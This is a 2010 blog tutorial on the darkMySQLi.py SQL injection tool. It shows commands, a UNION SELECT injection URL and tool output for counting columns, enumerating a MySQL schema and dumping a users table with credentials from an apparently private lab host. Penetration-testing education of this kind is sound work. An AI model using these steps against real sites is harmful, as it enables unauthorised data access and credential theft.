Saturday, March 06, 2010

Multi Purpose MySQL Injection Tool - darkMySQLi.py

I would like to share with you about darkMySQLi.py, a Multi Purpose MySQL Injection tool that developed by rsauron (rsauron@gmail.com), one of darkc0deCrews (www.darkc0de.com). This Python script allows you to automate 80% of the search and exploitation of SQL injection. I’m using this tool since Feb 2009 and I can say that this tool will help you and reduce time to find Blind SQL or SQL injection during web application penetration testing. This tool is very useful especially for IT security consultant or people who are involved in penetration testing because it will help you to save your time for finding MySQL vulnerability.
Today, I will show you how to use darkMySQLi.py until you successfully compromised MySQL database server. If you used Google and search for “darkMySQLi.py” word, you will see a lot of articles and links about this tool. For more explanations, I hope you can refer to that articles and can download tool from there. When you are using this tool, it is very easy to find MySQL vulnerability and it only takes 2-3 minutes to finish your hands-on for web assessment. So, you will have much time to verify the findings and do research about the solutions to prevent SQL Injection vulnerability.
Before you start using darkMySQLi.py tool, you need to find a vulnerable website or link where you can inject malicious code or character to the vulnerable parameter on the website. For the example below, you can see there is a vulnerability in the id parameter where you can insert character string such as +, - ,",', <>, %,;,(), &. This vulnerability happened because the programmer or webmaster of the server did not sanitize user input and filter out the code properly. When you put or insert character, number and code to the vulnerable parameter, you will see MySQL syntax errors occurred.
Targeted URL:  http://192.168.2.10/news/popup_news.php?id=22
For the targeted URL above, when I try to input this at the character string 22 after id parameter at the popup_news.php page, it shows this MySQL syntax error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/johncrackernet/www/htdocs/functions.php on line 114.
From the syntax error, you can see MySQL vulnerability occurred at character string 22 after id parameter where it allows you to perform SQL injection attack to this website. 

Step 1: Finding number of columns in MySQL Database

To perform SQL injection attack, I used darkMySQLi.py to attack the targeted URL above. You must understand and know how to use darkMySQLi.py tool. If you do not understand how to use it, you can refer to the Help menu that built-in together with this tool (Use darkMySQLi.py –h command to see Help menu)
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py -h
       darkMySQLi v1.6     rsauron@gmail.com
                                          forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help                                shows this help message and exits
-d, --debug                             display URL debug information
Target:
-u URL,                                 --url=URL  Target url
Methodology:
-b, --blind                              Use blind methodology (req: --string)
-s, --string                             String to match in page when the query is valid
Method:                
--method=PUT                    Select to use PUT method ** NOT WORKING
Modes:
--dbs                                       Enumerate databases MySQL v5+
--schema                               Enumerate Information_schema (req: -D,opt: -T) MySQL v5  
--full                                       Enumerate all we can          MySQL v5+
--info                                      MySQL Server configuration    MySQL v4+
--fuzz                                      Fuzz Tables & Columns Names   MySQL v4+
--findcol                                 Find Column length            MySQL v4+
--dump                                   Dump database table entries (req:-T,opt:-D,-C,--start  MySQL v4+          
--crack=HASH                     Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT            Wordlist to be used for cracking
Define:
-D DB                                     database to enumerate
-T TBL                                   database table to enumerate
-C COL                                  database table column to enumerate
Optional:
--ssl                                        To use SSL
--end                                       To use   +  and -- for the URLS --end "--" (Default)
                                                To use /**/ and /* for the URLS --end "/*"
--rowdisp                               Do not display row # when dumping
--start=ROW                        Row number to begin dumping at
--where=COL,VALUE       Use a where clause in your dump
--orderby=COL                    Use a orderby clause in your dump
--cookie=FILE.TXT             Use a Mozilla cookie file
--proxy=PROXY                   Use a HTTP proxy to connect to the target url
--output=FILE.TXT            Output results of tool to this file

From the targeted URL that I have tested above, I found vulnerability at character string 22 after parameter id that will allow us to do SQL injection. So, I used this vulnerable page (URL: http://192.168.2.10/news/popup_news.php?id=22)  to test with darkMySQLi.py tool.
Use this command to find the number of columns in the database:
./darkMySQLi.py –u “URL” --findcol
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py –u “http://192.168.2.10/news/popup_news.php?id=22" --findcol
|-------------------------------------------------- |
| rsauron@gmail.com                  v1.6   |
|   1/2009      darkMySQLi.py               |
|Multi Purpose MySQL Injection Tool|
| Usage: darkMySQLi.py [options]      |
|             -h help       darkc0de.com       |
|-------------------------------------------------- |
[+] URL: http://192.168.2.10/news/popup_news.php?id=22
[+] 06:28:14
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
        Proxy: 192.168.2.2:8080 - Success
[+] Proxy List Complete
[+] Attempting To find the number of columns...
[+] Testing: 1, 2,3,4,5,6,7,8,9,10,
[+] Column Length is: 10
[+] Found null column at column #: 3,4,7,8,

[!] SQLi URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
[!] darkMySQLi URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10--

[-] 06:28:23
[-] Total URL Requests: 10
[-] Done
Don't forget to check darkMySQLi.log

From the testing result above, I found a total of 10 columns for database. But, column number 3, 4, 7 & 8 are null column. From SQL Server perspective, a NULL is not a value, it only means that a value was not provided when the row was created. These null columns will give advantage to the attacker to test SQL injection. The results above show SQLi URL and darkMySQLi URL.  Based on the Python tool script, darkc0de function will try to concatenate supplied strings using MySQL CONCAT function, test hash database, generates hex representation of string and other functions. From darkMySQLi URL, we can see this darkc0de will try to test SQL injection at null columns for column number 3, 4, 7 & 8.      

Step 2: Enumerate all information in MySQL Database
In the first step, I already gather the information about the number of columns in database. I found 10 columns in the database and 4 of columns are null columns. These null columns can be exploited using SQL injection technique. From darkc0de string, this Python tool will try to concatenate all of the information as it can to the null columns by using MySQL CONCAT. In this step, darkMySQLi URL will be using to enumerate all of the information in database. This darkMySQLi URL will replace the previous URL that we have tested in the first step.
Use this command to find all of the information that can gather from database:
./darkMySQLi.py –u “darkMySQLi URL” --full

E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py -u “http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1, 2, darkc0de, darkc0de, 5, 6, darkc0de, darkc0de, 9, 10--" --full

|--------------------------------------------------  |
| rsauron@gmail.com                   v1.6   |
| 1/2009      darkMySQLi.py                  |
| Multi Purpose MySQLInjection Tool|
| Usage: darkMySQLi.py [options]       |
|             -h help       darkc0de.com        |
|--------------------------------------------------   |

[+] URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 06:29:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
        Proxy: 192.168.2.2:8080 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
        Database: dbtraffic
        User: johncrackernet@www.crackernet.org
        Version: 5.0.45-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 270

[Database]: dbtraffic
[Table: Columns]

[1]TRA_REG: id,tra_name,tra_lastname,tra_address,tra_passport,tra_state
[2]TRA_Events: events_id, events_title, events_url, events_desc, events_sched, events_status
[3]TRA_code: code,item,adl,ingred
[4]banner_ach: id,id_uname,image,impressions,clicks,url
[5]cal_file: id,page_main,filename,code
[6]cal_msg: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[7]cal_msg_backup: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[8]cal_name: id,name
[9]cal_users: uid,username,password,fname,lname,userlevel,email
[10]cal_memo: id,memo

[-] 06:35:12
[-] Total URL Requests: 25
[-] Done

The results above show this darkMySQLi.py tool successfully worked because it can enumerate all information in MySQL database such as database name, database version, tables, columns and rows. From the tables and columns that I have gathered, some of data are valuable and confidential. An attacker or hacker normally will look at the valuable data such as usernames, passwords, credit card numbers or Paypal accounts. Attackers will try to dump the data to get details and complete information from the servers or machines that they have compromised.
 
Step 3: Dumping the data from MySQL Database Table
In this step, I want to dump MySQL database table that contain usernames and passwords because all of these data can be consider as valuable and confidential.
Use this command to find all of the information that can gather from database:
./darkMySQLi.py –u “darkMySQLi URL” - -dump –D “Database name” –T “Table name” –C “Column”
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py –u "http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1, 2, dark0de, darkc0de, 5, 6,
darkc0de, darkc0de, 9, 10--" --dump -D dbtraffic -T cal_users -C uid,username,password,fname,lname,userlevel, email
|--------------------------------------------------|
| rsauron@gmail.com                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     -- Multi Purpose MySQL Injection Tool --     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |
|--------------------------------------------------|
[+] URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 07:00:41
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Building Proxy List...
        Proxy: 192.168.2.2:8080 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
        Database: dbtraffic
        User: johncrackernet@www.crackernet.org
        Version: 5.0.45-log
[+] Dumping data from database "dbtraffic" Table "cal_users"
[+] and Column(s) ['uid', 'username', 'password', 'fname', 'lname', 'userlevel', 'email']
[+] Number of Rows: 1

[1] 1:admin:password:default:user:2:
[-] 07:00:44
[-] Total URL Requests: 3
[-] Done
Don't forget to check darkMySQLi.log

The results above show that I could gather information about id, username, password, fullname, email, and userlevel from row number 9 that I dumped from MySQL database.

As a conclusion, this darkMySQLi.py is very useful for especially for IT Security Consultant because you can save much times for penetration testing with the better quality findings.

If you want to download my simple article regarding this darkMySQLi.py, you can refer to The Exploit Database website.

3 comments:

Vigneswaran C said...

how to use that tool sir....
i need info.....

katty said...

All of us just want to use a network with a good quality, but when the network has some failures is necesary to know about the appropriate tools and fix the problem as soon as possible. Actually this blog is very useful. This is similar with a webside that i saw recently is called costa rica investment opportunities

Serhii said...

Very helpful post, thank you very much.
Only problem is that I would like to see what's 'behind the scenes', what exactly are the strings it sends.
I see only the results.
Any idea about that?

Thank you again, very high quality post.